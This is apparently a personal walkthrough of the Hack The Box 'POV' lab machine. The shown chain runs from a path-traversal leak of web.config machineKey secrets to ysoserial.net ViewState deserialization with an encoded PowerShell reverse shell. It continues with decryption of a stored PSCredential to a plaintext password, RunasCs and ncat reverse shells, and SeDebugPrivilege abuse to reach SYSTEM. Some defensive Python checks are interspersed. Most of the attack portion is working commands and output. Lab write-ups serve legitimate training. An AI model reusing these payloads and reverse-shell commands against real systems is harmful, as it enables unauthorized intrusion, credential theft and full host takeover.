Here are my notes on the POV box from Hack The Box.
POV: 10.129.230.183
sudo autorecon 10.129.230.183 --vhost-enum.hostname pov.htb --vhost-enum.wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --vhost-enum.threads 5 --global.domain pov.htb
Nmap scan report for pov.htb (10.129.230.183)
Host is up, received user-set (0.043s latency).
Scanned at 2025-06-04 19:33:17 GMT for 265s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
200 GET 6l 20w 1480c http://10.129.230.183/img/client-2.png
200 GET 162l 286w 2399c http://10.129.230.183/css/custom.css
200 GET 3l 15w 1063c http://10.129.230.183/img/client-4.png
200 GET 2l 284w 14244c http://10.129.230.183/js/aos.js
200 GET 14l 43w 2390c http://10.129.230.183/img/client-1.png
200 GET 8l 34w 2034c http://10.129.230.183/img/client-3.png
200 GET 4l 10w 382c http://10.129.230.183/img/favicon.png
200 GET 22l 132w 13356c http://10.129.230.183/img/smart-protect-1.jpg
200 GET 19l 133w 11607c http://10.129.230.183/img/smart-protect-2.jpg
200 GET 23l 207w 11858c http://10.129.230.183/img/smart-protect-3.jpg
200 GET 5l 26w 1732c http://10.129.230.183/img/client-5.png
200 GET 4l 66w 31000c http://10.129.230.183/font-awesome-4.7.0/css/font-awesome.min.css
200 GET 3l 20w 1898c http://10.129.230.183/img/client-6.png
200 GET 2l 220w 25983c http://10.129.230.183/css/aos.css
200 GET 13l 55w 5918c http://10.129.230.183/img/logo.png
200 GET 325l 1886w 151416c http://10.129.230.183/img/feature-2.png
200 GET 339l 1666w 139445c http://10.129.230.183/img/feature-1.png
200 GET 6l 1643w 150996c http://10.129.230.183/css/bootstrap.min.css
200 GET 234l 834w 12330c http://10.129.230.183/
200 GET 234l 834w 12330c http://10.129.230.183/Index.html
403 GET 29l 92w 1233c http://10.129.230.183/css/
403 GET 29l 92w 1233c http://10.129.230.183/img/
200 GET 234l 834w 12330c http://10.129.230.183/index.html
403 GET 29l 92w 1233c http://10.129.230.183/js/
403 GET 29l 92w 1233c http://10.129.230.183/CSS/
403 GET 29l 92w 1233c http://10.129.230.183/JS/
403 GET 29l 92w 1233c http://10.129.230.183/Css/
403 GET 29l 92w 1233c http://10.129.230.183/Js/
403 GET 29l 92w 1233c http://10.129.230.183/IMG/
403 GET 29l 92w 1233c http://10.129.230.183/Img/
200 GET 234l 834w 12330c http://10.129.230.183/INDEX.html
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://pov.htb/ -H "Host: FUZZ.pov.htb" --fs 12330
dev [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 90ms]
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dev.pov.htb/
sudo gobuster dir -u http://dev.pov.htb/portfolio -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x asp,aspx
About section:
The Download CV request, captured in Burp:
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=x0Z1oV5BBNGOk151Q7JX0AR9I94ay7GjgQm9%2F%2BmL6Dq9%2FoPBbFEWRzLr5dcqXZBLex%2B1BF79HonJFVjS0Yl9e60EN9A%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=yXYW9Bh2SMXV6I3OspWOjrQ%2FAK4uV63keZuigp2xqFKOkA0WVbrNUPZHIo3RPPg7%2FdvTLmroAQB1PFv%2F44zEs1bos5wzxu1KoUhyX2okOoaSW8g3jpGaGGgxpz6vEuATWlzL4A%3D%3D&file=cv.pdf
The file=cv.pdf parameter is interesting.
file=../../../cv.pdf - WORKS !
Could it be vulnerable to LFI?
file=/../../../web.config #WORKS !
file=web.config #WORKS !
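For comparison, a server-side check that would have rejected the traversal and the web.config requests above. This is an added example, not code from the box or from these notes. The download folder, the PDF-only allow-list and the function names are assumptions, and ntpath is used so the Windows path rules can be exercised on any OS.

```python
import ntpath

# Assumptions for this sketch: downloads live in their own folder outside
# the application root, and only PDFs are ever served from it.
DOWNLOAD_ROOT = r"C:\inetpub\downloads"
ALLOWED_EXT = {".pdf"}

def resolve_download(file_param):
    """Return the absolute path to serve, or None when the request is rejected."""
    if not file_param or "\x00" in file_param:
        return None
    # Windows accepts both separators, so normalise before any check.
    candidate = file_param.replace("/", "\\")
    # Rooted paths, drive letters (C:x) and UNC names never belong in the parameter.
    drive, _ = ntpath.splitdrive(candidate)
    if drive or candidate.startswith("\\"):
        return None
    # Collapse ".." segments, then require the result to stay under the root.
    full = ntpath.normpath(ntpath.join(DOWNLOAD_ROOT, candidate))
    root = ntpath.normcase(DOWNLOAD_ROOT) + "\\"
    if not ntpath.normcase(full).startswith(root):
        return None
    # Containment alone would still hand out any file inside the root
    # (the plain file=web.config case), so the extension is allow-listed too.
    if ntpath.splitext(full)[1].lower() not in ALLOWED_EXT:
        return None
    return full

def check_observed_requests():
    """Run the four parameter values from the notes through the check."""
    observed = ["cv.pdf", "../../../cv.pdf", "/../../../web.config", "web.config"]
    return {value: resolve_download(value) for value in observed}

if __name__ == "__main__":
    for value, result in check_observed_requests().items():
        print(f"file={value!r:28} -> {result or 'rejected'}")
```

The strict extension match also rejects Windows name variants such as a trailing dot or an alternate data stream suffix.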
web.config:
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
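The machineKey line above is the important part: it holds the static keys ASP.NET uses to validate (SHA1) and decrypt (AES) __VIEWSTATE, so anyone who can read web.config can produce a ViewState the server accepts.
ViewState target framework version: 4.5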
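A small audit for this finding, flagging a web.config that stores static machineKey values or uses a legacy validation algorithm, with the weak form next to a corrected one. This is an added example, not part of the original notes. Both sample configs are constructed, the key values are placeholders, and the function name is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like the web.config in these notes; the key
# values are placeholders, not the real keys.
WEAK = """<configuration><system.web>
  <httpRuntime targetFramework="4.5" />
  <machineKey decryption="AES" decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
              validation="SHA1" validationKey="PLACEHOLDER_VALIDATION_KEY" />
</system.web></configuration>"""

# Corrected counterpart: per-application auto-generated keys, HMAC validation.
FIXED = """<configuration><system.web>
  <httpRuntime targetFramework="4.5" />
  <machineKey decryption="AES" decryptionKey="AutoGenerate,IsolateApps"
              validation="HMACSHA256" validationKey="AutoGenerate,IsolateApps" />
</system.web></configuration>"""

LEGACY_VALIDATION = {"MD5", "SHA1", "3DES"}

def audit_machine_key(xml_text):
    """Return a list of findings for the <machineKey> element, empty if clean."""
    findings = []
    machine_key = next(ET.fromstring(xml_text).iter("machineKey"), None)
    if machine_key is None:
        return findings  # no element: ASP.NET falls back to auto-generated keys
    for attr in ("validationKey", "decryptionKey"):
        value = machine_key.get(attr, "AutoGenerate")
        if not value.startswith("AutoGenerate"):
            findings.append(f"{attr}: static key readable by anyone who can read web.config")
    algorithm = machine_key.get("validation", "").upper()
    if algorithm in LEGACY_VALIDATION:
        findings.append(f"validation={algorithm}: legacy algorithm")
    return findings

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("fixed", FIXED)):
        print(name, audit_machine_key(text) or "no findings")
```

In a web farm the keys have to be shared and cannot be auto-generated; there the fix is to keep them out of any path the application can serve and to rotate them after exposure.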
https://github.com/pwntester/ysoserial.net/releases
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping 10.10.14.142" --path="/portfolio/contact.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -c wget http://10.10.14.142/" --path="/portfolio/contact.aspx" --apppath="/portfolio" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio/contact.aspx" -c "powershell.exe Invoke-WebRequest -Uri http://10.10.14.142/$env:UserName"
ysoserial.exe -p ViewState -g WindowsIdentity --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio" -c "ping 10.10.14.142"
WORKS !:
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA0ADIAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
https://github.com/julianssb/HackTheBox/blob/main/pov%20-%20VIEWSTATE%20-%20Powershell%20creds%20-%20Migrate%20process
┌──(root㉿kali)-[/home/kali/BOXES/POV]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.142] from (UNKNOWN) [10.129.230.183] 49671
whoami
pov\sfitz
PS C:\windows\system32\inetsrv> whoami
pov\sfitz
PS C:\windows\system32\inetsrv> hostname
pov
USER-SHELL !
PRIV ESC:
sfitz -> alaading:
PS C:\Users\sfitz> cd Documents
PS C:\Users\sfitz\Documents> dir
Directory: C:\Users\sfitz\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/25/2023 2:26 PM 1838 connection.xml
PS C:\Users\sfitz\Documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6" | convertto-securestring
$user = "pov\alaading"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
PS C:\Users\sfitz\Documents> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6" | convertto-securestring
PS C:\Users\sfitz\Documents> $user = "pov\alaading"
PS C:\Users\sfitz\Documents> $cred = New-Object System.management.Automation.PSCredential($user, $pass)
PS C:\Users\sfitz\Documents> $cred.GetNetworkCredential() | fl
UserName : alaading
Password : f8gQ8fynP44ek1m3
SecurePassword : System.Security.SecureString
Domain : pov
alaading:f8gQ8fynP44ek1m3
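The Password value in connection.xml is a SecureString exported without a key, which means it is protected with DPAPI under the exporting user's account and any process running as that user on that host can turn it back into plaintext. The following added example (not part of the original notes) finds such stored credentials in CLIXML files so they can be inventoried and removed. The sample file, its user name and its truncated blob are constructed.

```python
import xml.etree.ElementTree as ET

NS = {"ps": "http://schemas.microsoft.com/powershell/2004/04"}
# DPAPI blob prefix: version 1 followed by the DPAPI provider GUID. It is the
# same prefix the Password value in connection.xml starts with.
DPAPI_HEADER = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# Constructed sample: hypothetical user, blob cut down to header plus padding.
SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <S N="UserName">svc_example</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0000000000000000</SS>
    </Props>
  </Obj>
</Objs>"""

def find_stored_credentials(clixml_text):
    """List PSCredential objects serialized in a CLIXML document."""
    hits = []
    root = ET.fromstring(clixml_text)
    for obj in root.iter("{%s}Obj" % NS["ps"]):
        types = [t.text for t in obj.findall("ps:TN/ps:T", NS)]
        if "System.Management.Automation.PSCredential" not in types:
            continue
        user = obj.find("ps:Props/ps:S[@N='UserName']", NS)
        secret = obj.find("ps:Props/ps:SS[@N='Password']", NS)
        if secret is None:
            continue
        blob = (secret.text or "").strip().lower()
        hits.append({
            "user": user.text if user is not None else None,
            # True: recoverable by whoever runs as the exporting user on this host
            "dpapi_user_scope": blob.startswith(DPAPI_HEADER),
        })
    return hits

if __name__ == "__main__":
    print(find_stored_credentials(SAMPLE))
```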
import-module .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username alaading -Password 'f8gQ8fynP44ek1m3' -Command cmd.exe -Remote 10.10.14.142:4444
┌──(root㉿kali)-[/home/kali/BOXES/POV]
└─# sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.142] from (UNKNOWN) [10.129.230.183] 49673
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
pov\alaading
C:\Windows\system32>hostname
hostname
pov
C:\Users\alaading\Desktop>whoami
whoami
pov\alaading
C:\Users\alaading\Desktop>hostname
hostname
pov
C:\Users\alaading\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0899-6CAF
Directory of C:\Users\alaading\Desktop
01/11/2024 07:43 AM <DIR> .
01/11/2024 07:43 AM <DIR> ..
06/04/2025 11:36 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 7,094,108,160 bytes free
C:\Users\alaading\Desktop>type user.txt
type user.txt
[REDACTED]
USER.TXT: [REDACTED]
alaading -> SYSTEM:
C:\Users\alaading\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\alaading\Desktop>powershell.exe -ep bypass
powershell.exe -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\alaading\Desktop> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\alaading> Import-Module .\psgetsys.ps1
Import-Module .\psgetsys.ps1
PS C:\Users\alaading> Get-Process winlogon
Get-Process winlogon
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
255 12 2648 16448 0.19 552 1 winlogon
[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c C:\Users\Public\ncat.exe 10.10.14.142 5555 -e cmd.exe")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c C:\Users\Public\ncat.exe 10.10.14.142 5555 -e cmd.exe")
If that doesn't work, use the Metasploit way, as long as you know the PID of winlogon:
meterpreter > migrate 552
[*] Migrating from 2328 to 552...
[*] Migration completed successfully.
meterpreter > shell
Process 3064 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
pov
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
pov
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0899-6CAF
Directory of C:\Users\Administrator\Desktop
01/15/2024 05:11 AM <DIR> .
01/15/2024 05:11 AM <DIR> ..
06/04/2025 11:36 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,089,254,400 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows